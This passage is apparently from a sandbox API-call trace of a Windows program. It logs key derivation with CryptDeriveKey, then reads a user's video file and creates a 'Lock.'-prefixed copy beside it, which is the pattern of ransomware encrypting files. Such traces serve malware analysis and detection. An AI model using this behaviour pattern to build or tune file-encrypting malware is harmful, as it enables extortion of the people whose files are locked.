lpMsg=0x8cef58) returned 0 [0213.860] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.860] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0213.860] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.860] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0213.860] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.860] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.860] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0213.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab458, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0213.860] CryptDeriveKey (in: hProv=0xa7c550, Algid=0x6601, hBaseData=0x9e2238, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e21f8) returned 1 [0213.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.860] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.860] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0213.860] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.861] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0213.861] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0213.861] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0213.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0213.861] CryptDestroyHash (hHash=0x9e2238) returned 1 [0213.861] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.861] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.861] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.861] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.861] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.861] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/sDbATpZQ6r.swf" (normalized: "c:\\users\\fd1hvy\\videos\\sdbatpzq6r.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0213.862] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0213.862] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0213.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0213.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0213.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0213.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0213.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0213.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0213.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0213.863] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0213.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0213.863] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0213.863] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0213.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0213.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0213.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0213.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0213.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0213.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0213.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0213.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0213.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0213.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0213.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0213.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0213.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0213.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0213.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0213.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0213.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74ec8 [0213.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0213.864] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos/" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0213.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74ec8 | out: hHeap=0x2af0000) returned 1 [0213.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0213.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0213.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0213.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0213.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0213.865] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/Lock.sDbATpZQ6r.swf" (normalized: "c:\\users\\fd1hvy\\videos\\lock.sdbatpzq6r.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0213.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7180 [0213.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0213.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0213.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0213.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0213.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0213.866] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0213.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0213.866] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0213.866] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0213.866] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0213.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0213.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0213.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0213.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0213.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0213.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0213.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0213.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0213.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0213.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0213.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0213.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0213.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0213.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0213.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0213.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0213.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0213.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0213.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0213.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0213.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0213.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e6020 [0213.870] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0213.870] ReadFile (in: hFile=0x468, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0213.873] ReadFile (in: hFile=0x468, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x7996, lpOverlapped=0x0) returned 1 [0213.873] ReadFile (in: hFile=0x468, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0213.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0213.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0213.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17996) returned 0x2a8a138 [0213.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e6020 | out: hHeap=0x2af0000) returned 1 [0213.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0213.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0213.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0213.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0213.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0213.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0213.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0213.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17996) returned 0x2aae878 [0213.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0213.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.881] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0213.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0213.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0213.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0213.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0213.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17996) returned 0x2ac6218 [0213.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0213.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ac6218 | out: hHeap=0x2af0000) returned 1 [0213.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0213.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0213.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0213.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.884] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0213.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0213.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0213.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0213.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0213.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0213.884] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0213.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0213.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0213.884] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0213.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0213.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0213.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0213.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b08 [0213.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0213.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0213.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0213.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0213.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17996) returned 0x2ac6218 [0213.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0213.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71c68 [0213.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0213.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0213.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0213.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71c48 [0213.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0213.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0213.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0213.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71d28 [0213.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0213.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0213.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0213.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab2d8 [0213.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0213.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0213.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0213.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0213.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0213.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0213.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0213.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17996) returned 0x2a8a138 [0213.889] RtlAllocateHeap (HeapHandle=0x2af0000, 